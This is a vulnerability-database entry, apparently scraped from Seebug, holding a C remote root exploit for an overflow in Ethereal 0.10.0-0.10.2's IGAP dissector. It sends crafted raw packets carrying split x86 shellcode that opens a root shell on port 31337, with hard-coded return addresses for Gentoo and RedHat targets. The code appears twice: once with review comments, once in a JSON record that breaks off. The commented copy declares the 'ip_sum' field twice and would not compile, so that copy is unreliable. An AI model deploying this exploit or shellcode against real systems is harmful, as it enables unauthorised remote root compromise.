ID SSV:8595
Type seebug
Reporter Root
Modified 2008-06-05T00:00:00
Description
No description provided by source.
/*
* THE EYE ON SECURITY RESEARCH GROUP - INDIA
* Ethereal IGAP Dissector Message Overflow Remote Root exploit
*
* Copyright 2004 - EOS-India Group
*
* Authors note:
* Shellcode splitting technique:
* Due to difficulty involved while following normal exploitation techniques due to shortage of memory space
* for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode
* is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which
* jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode
* requires EBP to contain a usable stack address, we overwrite saved EBP also.
*
* Disclaimer:
* This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot
* be held responsible for any damage caused due to misuse of this code.
* This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to
* Ethereal 0.10.2.
*
* Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]
* http://www.eos-india.net
*
*/
#define IPPROTO_IGAP 0x02 // IPPROTO_IGMP=0x02
#define PAYLOAD_SIZE (255-64)
#define MAX_BUFF sizeof(struct igap_header)+sizeof(struct ipheader)
#define EXP "Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"
#define VER "0.2"
#define SOCKET_ERROR -1
#define MAX_PACKET 10
#define RETOFFSET 76
#define SRC_IP "192.31.33.7"
#include <stdio.h>
#include <signal.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>
#include <signal.h>
#include <netdb.h>
#define MAX_ARCH 5
// Target table: a printable label plus the hard-coded stack address that main()
// writes over the saved EIP. The initializer relies on brace elision, so each
// label/address pair fills one struct eos. The list ends with a NULL label;
// MAX_ARCH (5) must stay equal to the number of real entries because main()
// bounds-checks the index against MAX_ARCH, not against the terminator.
// The leading 't' in some labels presumably denotes the text-mode (tethereal)
// build — confirm.
struct eos{
	char *arch;		// human-readable target label, shown by showhelp()
	unsigned long ret;	// address planted in the saved-EIP slot (see main)
} targets[] = {
	"tEthereal(0.10.2)-Gentoo(gdb)",
	0xbffede50,
	//-------------------------------
	"tEthereal(0.10.2)-Gentoo ",
	0xbffede10,
	//-------------------------------
	"Ethereal(0.10.2)-Gentoo ",
	0xbfffd560,
	//-------------------------------
	"tEthereal(0.10.2)-RedHat 8 ",
	0xbffedfb8,
	//-------------------------------
	"Ethereal(0.10.2)-RedHat 8 ",
	0xbfffcd08,
	//-------------------------------
	NULL,	// terminator for the showhelp() loop
	0
};
/*
x86 linux portbind a shell in port 31337
based on shellcode from www.shellcode.com.ar
with a few modifications by us
*/
// First half of the payload: fork (the path where fork returned non-zero falls
// into sys_exit; the je skips it when eax==0), setuid(0) and socket(). All
// network calls go through socketcall (eax=0x66) with the argument block stored
// at fixed offsets from EBP — which is why main() also plants a usable stack
// address in the saved-EBP slot (see the header note on shellcode splitting).
// Written into the region ahead of the overwritten EBP/EIP slots.
char shellcode_firsthalf[]=
	/* sys_fork() */
	"\x31\xc0" // xorl %eax,%eax
	"\x31\xdb" // xorl %ebx,%ebx
	"\xb0\x02" // movb $0x2,%al
	"\xcd\x80" // int $0x80
	"\x38\xc3" // cmpl %ebx,%eax
	"\x74\x05" // je 0x5
	/* sys_exit() */
	"\x8d\x43\x01" // leal 0x1(%ebx),%eax
	"\xcd\x80" // int $0x80
	/* setuid(0) */
	"\x31\xc0" // xorl %eax,%eax
	"\x31\xdb" // xorl %ebx,%ebx
	"\xb0\x17" // movb $0x17,%al
	"\xcd\x80" // int $0x80
	/* socket() */
	"\x31\xc0" // xorl %eax,%eax
	"\x89\x45\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)
	"\x40" // incl %eax
	"\x89\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)
	"\x89\x45\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)
	"\x40" // incl %eax
	"\x89\x45\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)
	"\x8d\x4d\x08" // leal 0x8(%ebp),%ecx
	"\xb0\x66" // movb $0x66,%al
	"\xcd\x80" // int $0x80
	"\x89\x45\x08" // movl %eax,0x8(%ebp)
	;
// Two-byte short jmp (+0x10). main() places it just ahead of the saved-EBP/EIP
// slots so execution hops over them into the 0x90 fill that precedes the second
// half.
char jumpcode[]="\xeb\x10";
// Second half of the payload: bind(port 31337), listen, accept, dup2 of fds 0-2
// onto the accepted socket, then execve("//bin/sh"). Continues to use the
// EBP-relative argument block set up by the first half, and is written at the
// very end of igap_payload by main().
char shellcode_secondhalf[]=
	/* bind()*/
	"\x43" // incl %ebx(SYS_BIND = 0x2)
	"\x66\x89\x5d\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)
	"\x66\xc7\x45\x16\x7a\x69" // movw $0x697a,0x16(%ebp)(port=31337)
	"\x31\xd2" // xorl %edx,%edx
	"\x89\x55\x18" // movl %edx,0x18(%ebp)
	"\x8d\x55\x14" // leal 0x14(%ebp),%edx
	"\x89\x55\x0c" // movl %edx,0xc(%ebp)
	"\xc6\x45\x10\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)
	"\xb0\x66" // movb $0x66,%al
	"\xcd\x80" // int $0x80
	/* listen() */
	"\x40" // incl %eax
	"\x89\x45\x0c" // movl %eax,0xc(%ebp)
	"\x43" // incl %ebx
	"\x43" // incl %ebx(SYS_LISTEN = 0x4)
	"\xb0\x66" // movb $0x66,%al
	"\xcd\x80" // int $0x80
	/* accept() */
	"\x43" // incl %ebx
	"\x89\x45\x0c" // movl %eax,0xc(%ebp)
	"\x89\x45\x10" // movl %eax,0x10(%ebp)
	"\xb0\x66" // movb $0x66,%al
	"\xcd\x80" // int $0x80
	"\x89\xc3" // movl %eax,%ebx
	/* dup2() */
	"\x31\xc9" // xorl %ecx,%ecx
	"\xb0\x3f" // movb $0x3f,%al
	"\xcd\x80" // int $0x80
	"\x41" // incl %ecx
	"\x80\xf9\x03" // cmpb $0x3,%cl
	"\x75\xf6" // jne -0xa
	/* execve() */
	"\x31\xd2" // xorl %edx,%edx
	"\x52" // pushl %edx
	"\x68\x6e\x2f\x73\x68" // pushl $0x68732f6e
	"\x68\x2f\x2f\x62\x69" // pushl $0x69622f2f
	"\x89\xe3" // movl %esp,%ebx
	"\x52" // pushl %edx
	"\x53" // pushl %ebx
	"\x89\xe1" // movl %esp,%ecx
	"\xb0\x0b" // movb $0xb,%al
	"\xcd\x80"; // int $0x80
// Hand-built IPv4 header for the IP_HDRINCL raw socket opened in main().
// The field widths sum to 20 bytes; there is no packing attribute, so the wire
// layout presumably relies on natural alignment on the targeted ABI — confirm.
struct ipheader {
	unsigned char ip_hl:4, ip_v:4;	// header length (32-bit words) then version; bit-field order is compiler-defined, written for little-endian x86 here — confirm
	unsigned char ip_tos;
	unsigned short int ip_len;	// total length; main() stores MAX_BUFF here without htons()
	unsigned short int ip_id;
	unsigned short int ip_off;	// flags + fragment offset
	unsigned char ip_ttl;
	unsigned char ip_proto;		// main() sets IPPROTO_IGAP, i.e. the IGMP protocol number 2
	unsigned char ip_sum;
	unsigned short int ip_sum;	// header checksum, filled by checksum() in main()
	unsigned int ip_src;		// network byte order, as returned by inet_addr()
	unsigned int ip_dst;
};
// IGAP message as sent on the wire. The fixed part is 16 bytes; the trailing
// igap_payload folds the 16-byte account field, the 64-byte message field and
// PAYLOAD_SIZE extra bytes into one array, so sizeof(struct igap_header) is
// 16+16+64+191 = 287 — an odd size, which matters for the >>1 word count
// main() passes to checksum().
struct igap_header { // This is a malformed header which does not conform to the IGAP RFC
	unsigned char igap_type; // Message Type
	unsigned char igap_restime; // Response Time
	unsigned short int igap_cksum; // IGAP Message Checksum
	unsigned int igap_gaddr; // Group Address
	unsigned char igap_ver; // Version
	unsigned char igap_stype; // SubType
	unsigned char igap_reserved1; // Reserved
	unsigned char igap_cid; // Challenge ID
	unsigned char igap_asize; // Account Size
	unsigned char igap_msgsize; // Message Size (one byte, so at most 255)
	unsigned short int igap_reserved2; // Reserved
	/*
	unsigned char igap_uaccount[16];// User Account
	unsigned char igap_message[64] // Message
	*/
	unsigned char igap_payload[16+64+PAYLOAD_SIZE];
	// This buffer will contain the payload; here we differ from the RFC by sending a bigger message.
};
/*
 * Internet-style one's-complement checksum.
 *
 * buf    - sequence of 16-bit words to sum (advanced in place; caller's
 *          pointer copy is unaffected)
 * nwords - number of words to include; zero or negative sums nothing
 *
 * Returns the folded, inverted 16-bit sum. A trailing odd byte is not
 * covered; the caller is responsible for the word count it passes.
 */
unsigned short checksum(unsigned short *buf,int nwords)
{
	unsigned long acc = 0;
	int remaining = nwords;
	while (remaining > 0) {
		acc += *buf;
		buf++;
		remaining--;
	}
	/* Fold the carries above bit 15 back in; the second add catches the
	 * carry the first fold can itself produce. */
	acc = (acc & 0xffff) + (acc >> 16);
	acc += (acc >> 16);
	return (unsigned short)~acc;
}
/*
 * Print the banner, usage line and the table of known targets, then exit(1).
 * Never returns. The target list is walked until the NULL label that
 * terminates targets[]. The "%p" conversion is fed an unsigned long, as in
 * the original; it is kept for identical output.
 */
void showhelp(char *pr00gie) {
	printf("######### The Eye on Security Research Group - India ########\n");
	printf("%s %s\n",EXP,VER);
	printf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\n");
	printf("http://www.eos-india.net\n\n");
	printf("[usage]\n");
	printf("%s [Remote Host] [Target]\n",pr00gie);
	printf("[Available Targets]\n");
	for (int idx = 0; targets[idx].arch != NULL; idx++) {
		printf("%d. - %s\t - %p\n",(idx),targets[idx].arch,targets[idx].ret);
	}
	exit(1);
}
/*
 * Entry point: assembles one raw IPv4+IGAP packet in `buffer` and sends
 * MAX_PACKET copies of it to argv[1], using the return address of the target
 * selected by argv[2]. Exits non-zero when not running as root, on bad
 * arguments, or when the raw socket cannot be created.
 *
 * NOTE(review): inet_addr()/htonl() (<arpa/inet.h>), memset()/memcpy()/strlen()
 * (<string.h>) and atoi()/exit() (<stdlib.h>) are used without their headers
 * being included above, so the file relies on implicit declarations, which
 * modern compilers reject. struct sockaddr_in and INADDR_NONE presumably come
 * in through <netdb.h> — confirm.
 */
int main(int argc,char *argv[]) {
	char buffer[MAX_BUFF];		// IP header immediately followed by the IGAP header; MAX_BUFF is an unparenthesised sum (307 bytes), fine here but fragile inside larger expressions
	struct ipheader *iphdr=(struct ipheader*)buffer;
	struct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));
	int sockfd;
	unsigned long addr;
	int one=1;			// setsockopt() value; reused below as the send loop counter
	int i;				// unused: only referenced by the commented-out loop below
	const int *val=&one;
	struct sockaddr_in sin;
	unsigned long magic;		// target return address; minus 0x10 it is also the saved-EBP value
	unsigned int n;			// target index
	if(getuid()) {
		printf("- This code opens SOCK_RAW which needs root privilege\n");
		exit(1);
	}
	if(argc != 3)
		showhelp(argv[0]);	// showhelp() calls exit(); execution never continues past here
	n=atoi(argv[2]);		// atoi() reports no errors: non-numeric input silently selects target 0
	if(n >= MAX_ARCH) {		// n is unsigned, so a negative argument also lands here
		printf("- Invalid target\n");
		showhelp(argv[0]);
	}
	magic=targets[n].ret;
	printf("-Using RET %p\n",magic);	// %p with an unsigned long is a format/argument mismatch
	addr=inet_addr(argv[1]);
	if(addr==INADDR_NONE) {
		printf("- Invalid target\n");
		exit(1);
	}
	sin.sin_addr.s_addr=addr;
	sin.sin_family=AF_INET;
	sin.sin_port=0x00;		// raw socket: the port is meaningless
	sockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);
	if(sockfd==SOCKET_ERROR) {
		printf("- Failed creating SOCK_RAW descriptor\n");
		exit(1);
	}
	if(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)	// we supply the IP header ourselves
		printf ("- WARNING !! :Cannot set IP_HDRINCL!\n");	// non-fatal: sending proceeds regardless
	memset(buffer,0x00,MAX_BUFF);
	// Filling IP Header
	iphdr->ip_hl=0x05;
	iphdr->ip_v=0x04;
	iphdr->ip_tos=0x00;
	iphdr->ip_len=MAX_BUFF;		// host byte order, no htons(); NOTE(review): check what the raw socket expects for this field
	iphdr->ip_id=htonl(54321);	// 32-bit htonl() result truncated into a 16-bit field; htons() was presumably intended
	iphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset
	iphdr->ip_ttl=0x01;
	iphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP
	iphdr->ip_sum=0x00; // Fill sum before sending packet
	iphdr->ip_src=inet_addr (SRC_IP);	// fixed source address from SRC_IP, not the sender's own
	iphdr->ip_dst=addr;
	// Filling IGAP Header
	igaphdr->igap_type=0x41; // IGAP Membership Query
	igaphdr->igap_restime=0x0a; // response time
	igaphdr->igap_cksum=0x00; // compute before sending packet
	igaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message
	igaphdr->igap_ver=0x01; // IGAPv1
	igaphdr->igap_stype=0x21; // Basic Query
	igaphdr->igap_reserved1=0x00; // Ignored
	igaphdr->igap_cid=0x00;
	// Challenge ID (ignored because Challenge Response authentication not used)
	igaphdr->igap_asize=0x10; // MAX Size of Account Name Field
	igaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message: 64+191 = 255, the largest value the byte field can hold
	igaphdr->igap_reserved2=0x00; // Reserved
	// Building exploit buffer
	//for(i=0;i<16+64+PAYLOAD_SIZE;i++)
	//	memset(igaphdr->igap_payload+i,(unsigned char)i,1);
	// Payload layout (offsets into igap_payload): 0x90 fill everywhere, the first
	// shellcode half ahead of the saved-EBP/EIP slots at 16+64+RETOFFSET-4 and
	// 16+64+RETOFFSET, the short jmp just before those slots, and the second half
	// at the very end. None of the offset arithmetic is bounds-checked: it only
	// works while each half fits its gap (the subtractions are done in size_t,
	// so an over-long half would wrap the pointer rather than fail).
	memset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);
	memcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,
	strlen(shellcode_firsthalf));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);	// saved EIP slot
	magic-=0x10;
	memcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);	// saved EBP slot
	memcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,
	shellcode_secondhalf,strlen(shellcode_secondhalf));
	// Calculating checksum
	// sizeof(struct igap_header) is odd (287), so >>1 leaves the final byte out of the sum.
	igaphdr->igap_cksum=checksum((unsigned short*)(buffer+sizeof(struct ipheader)),
	(sizeof(struct igap_header))>>1);
	// Summed over the whole packet (ip_len words), not just the 20-byte IP header, and
	// ip_len (307) is odd too. NOTE(review): an IPv4 header checksum covers only the
	// header — this presumably relies on the kernel recomputing it for IP_HDRINCL; confirm.
	iphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);
	// Sending
	one=MAX_PACKET;
	while(one) {
		sendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));	// return value and errno are ignored
		printf(".");
		one--;
	}
	close(sockfd);
	printf("\n- Send %d packets to %s\n",MAX_PACKET,argv[1]);
	printf("- Read source to know what to do to check if the exploit worked\n");
	return 0;
}
{"sourceData": "\n /* \r\n * THE EYE ON SECURITY RESEARCH GROUP - INDIA\r\n * Ethereal IGAP Dissector Message Overflow Remote Root exploit\r\n *\r\n * Copyright 2004 - EOS-India Group\r\n *\r\n * Authors note:\r\n * Shellcode splitting technique:\r\n * Due to difficulty involved while following normal exploitation techniques due to shortage of memory space\r\n * for our shellcode, we used the technique of shellcode splitting. In this technique one part of the shellcode\r\n * is kept before the buffer which overwrites the saved EIP on stack followed by a jmp OFFSET instruction which\r\n * jumps EIP to the second half of the shellcode which is kept after return address. Also since our shellcode \r\n * requires EBP to contain a usuable stack address, we overwrite saved EBP also.\r\n *\r\n * Disclaimer:\r\n * This code is for educational purpose and testing only. The Eye on Security Research Group - India, cannot\r\n * be held responsible for any damage caused due to misuse of this code.\r\n * This code is a proof of concept exploit for a serious vulnerability that exists in Ethereal 0.10.0 to\r\n * Ethereal 0.10.2.\r\n *\r\n * Nilanjan De [n2n+linuxmail.org] - Abhisek Datta [abhisek+front.ru]\r\n * http://www.eos-india.net\r\n *\r\n*/\r\n#define IPPROTO_IGAP\t0x02 // IPPROTO_IGMP=0x02 \t\r\n#define PAYLOAD_SIZE\t(255-64)\t\r\n#define MAX_BUFF\tsizeof(struct igap_header)+sizeof(struct ipheader)\r\n#define EXP\t\t"Ethereal(v0.10.0-0.10.2) IGAP Dissector Message Overflow Exploit"\r\n#define VER\t\t"0.2"\r\n#define SOCKET_ERROR\t-1\r\n#define MAX_PACKET\t10\r\n#define RETOFFSET \t76 \r\n#define SRC_IP\t\t"192.31.33.7"\r\n#include <stdio.h>\r\n#include <signal.h>\r\n#include <sys/socket.h>\r\n#include <sys/types.h>\r\n#include <unistd.h>\r\n#include <signal.h>\r\n#include <netdb.h>\r\n\r\n#define MAX_ARCH\t5\r\nstruct eos{\r\n\tchar *arch;\r\n\tunsigned long ret;\r\n} targets[] = 
{\r\n\t"tEthereal(0.10.2)-Gentoo(gdb)",\r\n\t0xbffede50,\r\n\t//-------------------------------\r\n\t"tEthereal(0.10.2)-Gentoo ",\r\n\t0xbffede10,\r\n\t//-------------------------------\r\n\t"Ethereal(0.10.2)-Gentoo ",\r\n\t0xbfffd560,\r\n\t//-------------------------------\r\n\t"tEthereal(0.10.2)-RedHat 8 ",\r\n\t0xbffedfb8,\r\n\t//-------------------------------\r\n\t"Ethereal(0.10.2)-RedHat 8 ",\r\n\t0xbfffcd08,\r\n\t//-------------------------------\r\n\tNULL,\r\n\t0\r\n};\r\n\t\r\n\r\n/*\r\n x86 linux portbind a shell in port 31337\r\n based on shellcode from www.shellcode.com.ar\r\n with a few modifications by us\r\n*/\r\n \r\nchar shellcode_firsthalf[]=\r\n /* sys_fork() */\r\n\t"\\x31\\xc0" // xorl %eax,%eax\r\n\t"\\x31\\xdb" // xorl %ebx,%ebx\r\n\t"\\xb0\\x02" // movb $0x2,%al\r\n\t"\\xcd\\x80" // int $0x80\r\n\t"\\x38\\xc3" // cmpl %ebx,%eax\r\n\t"\\x74\\x05" // je 0x5\r\n\t/* sys_exit() */\r\n\t"\\x8d\\x43\\x01" // leal 0x1(%ebx),%eax\r\n\t"\\xcd\\x80" // int $0x80\r\n /* setuid(0) */\r\n "\\x31\\xc0" // xorl %eax,%eax\r\n "\\x31\\xdb" // xorl %ebx,%ebx\r\n "\\xb0\\x17" // movb $0x17,%al\r\n "\\xcd\\x80" // int $0x80\r\n /* socket() */\r\n "\\x31\\xc0" // xorl %eax,%eax\r\n "\\x89\\x45\\x10" // movl %eax,0x10(%ebp)(IPPROTO_IP = 0x0)\r\n "\\x40" // incl %eax\r\n "\\x89\\xc3" // movl %eax,%ebx(SYS_SOCKET = 0x1)\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)(SOCK_STREAM = 0x1)\r\n "\\x40" // incl %eax\r\n "\\x89\\x45\\x08" // movl %eax,0x8(%ebp)(AF_INET = 0x2)\r\n\t"\\x8d\\x4d\\x08" // leal 0x8(%ebp),%ecx\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x89\\x45\\x08" // movl %eax,0x8(%ebp)\r\n\t;\t\r\nchar jumpcode[]="\\xeb\\x10";\r\n\r\nchar shellcode_secondhalf[]=\r\n /* bind()*/\r\n "\\x43" // incl %ebx(SYS_BIND = 0x2)\r\n "\\x66\\x89\\x5d\\x14" // movw %bx,0x14(%ebp)(AF_INET = 0x2)\r\n\t"\\x66\\xc7\\x45\\x16\\x7a\\x69" // movw $0x697a,0x16(%ebp)(port=31337)\r\n "\\x31\\xd2" // xorl %edx,%edx\r\n "\\x89\\x55\\x18" // movl 
%edx,0x18(%ebp)\r\n "\\x8d\\x55\\x14" // leal 0x14(%ebp),%edx\r\n "\\x89\\x55\\x0c" // movl %edx,0xc(%ebp)\r\n "\\xc6\\x45\\x10\\x10" // movb $0x10,0x10(%ebp)(sizeof(struct sockaddr) = 10h = 16)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n \r\n /* listen() */\r\n "\\x40" // incl %eax\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)\r\n "\\x43" // incl %ebx\r\n "\\x43" // incl %ebx(SYS_LISTEN = 0x4)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n \r\n /* accept() */\r\n "\\x43" // incl %ebx\r\n "\\x89\\x45\\x0c" // movl %eax,0xc(%ebp)\r\n "\\x89\\x45\\x10" // movl %eax,0x10(%ebp)\r\n "\\xb0\\x66" // movb $0x66,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x89\\xc3" // movl %eax,%ebx\r\n \r\n /* dup2() */\r\n "\\x31\\xc9" // xorl %ecx,%ecx\r\n "\\xb0\\x3f" // movb $0x3f,%al\r\n "\\xcd\\x80" // int $0x80\r\n "\\x41" // incl %ecx\r\n "\\x80\\xf9\\x03" // cmpb $0x3,%cl\r\n "\\x75\\xf6" // jne -0xa\r\n \r\n /* execve() */\r\n "\\x31\\xd2" // xorl %edx,%edx\r\n "\\x52" // pushl %edx\r\n "\\x68\\x6e\\x2f\\x73\\x68" // pushl $0x68732f6e\r\n "\\x68\\x2f\\x2f\\x62\\x69" // pushl $0x69622f2f\r\n "\\x89\\xe3" // movl %esp,%ebx\r\n "\\x52" // pushl %edx\r\n "\\x53" // pushl %ebx\r\n "\\x89\\xe1" // movl %esp,%ecx\r\n "\\xb0\\x0b" // movb $0xb,%al\r\n "\\xcd\\x80"; // int $0x80\r\n \r\nstruct ipheader {\r\n\tunsigned char ip_hl:4, ip_v:4; \r\n\tunsigned char ip_tos;\r\n\tunsigned short int ip_len;\r\n\tunsigned short int ip_id;\r\n\tunsigned short int ip_off;\r\n\tunsigned char ip_ttl;\r\n\tunsigned char ip_proto;\r\n\tunsigned short int ip_sum;\r\n\tunsigned int ip_src;\r\n\tunsigned int ip_dst;\r\n};\r\n\r\nstruct igap_header { \t\t// This is a malformed header which does not conforms with IGAP RFC\r\n\tunsigned char igap_type; \t// Message Type\r\n\tunsigned char igap_restime; \t// Response Time\r\n\tunsigned short int igap_cksum; \t// IGAP Message Checksum\r\n\tunsigned int igap_gaddr; \t// Group Address\r\n\tunsigned char igap_ver; \t// 
Version\r\n\tunsigned char igap_stype;\t// SubType\r\n\tunsigned char igap_reserved1;\t// Reserved\r\n\tunsigned char igap_cid;\t\t// Challenge ID\r\n\tunsigned char igap_asize;\t// Account Size\r\n\tunsigned char igap_msgsize;\t// Message Size\r\n\tunsigned short int igap_reserved2;\t// Reserved\r\n\t/*\r\n\tunsigned char igap_uaccount[16];// User Account\r\n\tunsigned char igap_message[64]\t// Message\r\n\t*/\r\n\tunsigned char igap_payload[16+64+PAYLOAD_SIZE];\t\r\n// This buffer will contain payload, here we differ from RFC by sending a bigger message.\r\n};\r\n\r\nunsigned short checksum(unsigned short *buf,int nwords)\r\n{\r\n\tunsigned long sum;\r\n\tfor (sum = 0; nwords > 0; nwords--)\r\n\t\tsum += *(buf)++;\r\n\tsum = (sum >> 16) + (sum & 0xffff);\r\n\tsum += (sum >> 16);\r\n\treturn ~sum;\r\n}\r\n\r\nvoid showhelp(char *pr00gie) {\r\n\tint i=0;\r\n\tprintf("######### The Eye on Security Research Group - India ########\\n");\r\n\tprintf("%s %s\\n",EXP,VER);\r\n \tprintf("abhisek[at]front[dot]ru - n2n[at]linuxmail[dot]org\\n");\r\n \tprintf("http://www.eos-india.net\\n\\n");\r\n\tprintf("[usage]\\n");\r\n\tprintf("%s [Remote Host] [Target]\\n",pr00gie);\r\n\tprintf("[Available Targets]\\n");\r\n\twhile(targets[i].arch != NULL) {\r\n\t\tprintf("%d. 
- %s\\t - %p\\n",(i),targets[i].arch,targets[i].ret);\r\n\t\ti++;\r\n\t}\r\n\texit(1); \r\n}\r\n\t \r\nint main(int argc,char *argv[]) {\r\n\tchar buffer[MAX_BUFF];\r\n\tstruct ipheader *iphdr=(struct ipheader*)buffer;\r\n\tstruct igap_header *igaphdr=(struct igap_header*)(buffer+sizeof(struct ipheader));\r\n\tint sockfd;\r\n\tunsigned long addr;\r\n\tint one=1;\r\n\tint i;\r\n\tconst int *val=&one;\r\n\tstruct sockaddr_in sin;\r\n\tunsigned long magic;\r\n\tunsigned int n;\r\n\t\r\n\tif(getuid()) {\r\n\t\tprintf("- This code opens SOCK_RAW which needs root privilege\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif(argc != 3)\r\n\t\tshowhelp(argv[0]);\r\n\tn=atoi(argv[2]);\r\n\tif(n >= MAX_ARCH) {\r\n\t\tprintf("- Invalid target\\n");\r\n\t\tshowhelp(argv[0]);\r\n\t}\r\n\tmagic=targets[n].ret;\r\n\tprintf("-Using RET %p\\n",magic);\r\n\taddr=inet_addr(argv[1]);\r\n\tif(addr==INADDR_NONE) {\r\n\t\tprintf("- Invalid target\\n");\r\n\t\texit(1);\r\n\t}\r\n\tsin.sin_addr.s_addr=addr;\r\n\tsin.sin_family=AF_INET;\r\n\tsin.sin_port=0x00;\r\n\tsockfd=socket(PF_INET,SOCK_RAW,IPPROTO_RAW);\r\n\tif(sockfd==SOCKET_ERROR) {\r\n\t\tprintf("- Failed creating SOCK_RAW descriptor\\n");\r\n\t\texit(1);\r\n\t}\r\n\tif(setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,val,sizeof(one)) < 0)\r\n\t\tprintf ("- WARNING !! 
:Cannot set IP_HDRINCL!\\n");\r\n\tmemset(buffer,0x00,MAX_BUFF);\r\n\t// Filling IP Header\r\n\tiphdr->ip_hl=0x05;\r\n\tiphdr->ip_v=0x04;\r\n\tiphdr->ip_tos=0x00;\r\n\tiphdr->ip_len=MAX_BUFF;\r\n\tiphdr->ip_id=htonl(54321);\r\n\tiphdr->ip_off=0x00; // Lower 3 bit=Flag4Fragmentation - Higher 13 Bit=Fragment Offset\r\n\tiphdr->ip_ttl=0x01;\r\n\tiphdr->ip_proto=IPPROTO_IGAP; // IPPROTO_IGMP\r\n\tiphdr->ip_sum=0x00; // Fill sum before sending packet\r\n\tiphdr->ip_src=inet_addr (SRC_IP); \r\n\tiphdr->ip_dst=addr;\r\n\t// Filling IGAP Header\r\n\tigaphdr->igap_type=0x41; // IGAP Membership Query\r\n\tigaphdr->igap_restime=0x0a; // \r\n\tigaphdr->igap_cksum=0x00; // compute before sending packet\r\n\tigaphdr->igap_gaddr=0x00; // Ignored in IGAP Membership Query Message\r\n\tigaphdr->igap_ver=0x01; // IGAPv1\r\n\tigaphdr->igap_stype=0x21; // Basic Query\r\n\tigaphdr->igap_reserved1=0x00; // Ignored\r\n\tigaphdr->igap_cid=0x00; \r\n\t// Challenge ID (ignored because Chanllenge Response authentication not used)\t\t\r\n\tigaphdr->igap_asize=0x10; // MAX Size of Account Name Field\r\n\tigaphdr->igap_msgsize=0x40+PAYLOAD_SIZE; // Size of Message\t\r\n\tigaphdr->igap_reserved2=0x00; // Reserved\r\n\t// Building exploit buffer\r\n\t//for(i=0;i<16+64+PAYLOAD_SIZE;i++)\r\n\t//\tmemset(igaphdr->igap_payload+i,(unsigned char)i,1);\r\n\tmemset(igaphdr->igap_payload,0x90,16+64+PAYLOAD_SIZE);\r\n\tmemcpy(igaphdr->igap_payload+16+RETOFFSET-strlen(shellcode_firsthalf)-8,shellcode_firsthalf,\r\n\tstrlen(shellcode_firsthalf));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-strlen(jumpcode)-4,jumpcode,strlen(jumpcode));\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET,&magic,4);\r\n\tmagic-=0x10;\r\n\tmemcpy(igaphdr->igap_payload+16+64+RETOFFSET-4,&magic,4);\r\n\tmemcpy(igaphdr->igap_payload+16+64+PAYLOAD_SIZE-strlen(shellcode_secondhalf)-1,\r\n shellcode_secondhalf,strlen(shellcode_secondhalf));\r\n\t// Calculating checksum\r\n\tigaphdr->igap_cksum=checksum((unsigned 
short*)(buffer+sizeof(struct ipheader)),\r\n\t(sizeof(struct igap_header))>>1);\r\n\tiphdr->ip_sum = checksum ((unsigned short*)buffer,(iphdr->ip_len)>>1);\r\n\t// Sending\r\n\tone=MAX_PACKET;\r\n\twhile(one) {\r\n\t\tsendto(sockfd,buffer,MAX_BUFF,0,(struct sockaddr*)&sin,sizeof(sin));\r\n\t\tprintf(".");\r\n\t\tone--;\r\n\t}\r\n\tclose(sockfd); \r\n\tprintf("\\n- Send %d packets to %s\\n",MAX_PACKET,argv[1]);\t\r\n\tprintf("- Read source to know what to do to check if the exploit worked\\n");\r\n\treturn 0;\r\n}\n ", "status": "poc", "description": "No description provided by source.", "sourceHref": "https://www.seebug.org/vuldb/ssvid-8595", "reporter": "Root", "href": "https://www.seebug.org/vuldb/ssvid-8595", "type": "seebug", "viewCount": 3, "references": [], "lastseen": "2017-11-19T21:40:37", "published": "2008-06-05T00:00:00", "cvelist": [], "id": "SSV:8595", "enchantments_done": [], "modified": "2008-06-05T00:00:00", "title": "Ethereal 0.10.0-0.10.2 IGAP Overflow Remote Root Exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "bulletinFamily": "exploit", "enchantments": {"score": {"value": 0.5, "vector": "NONE", "modified": "2017-11-19T21:40:37", "rev": 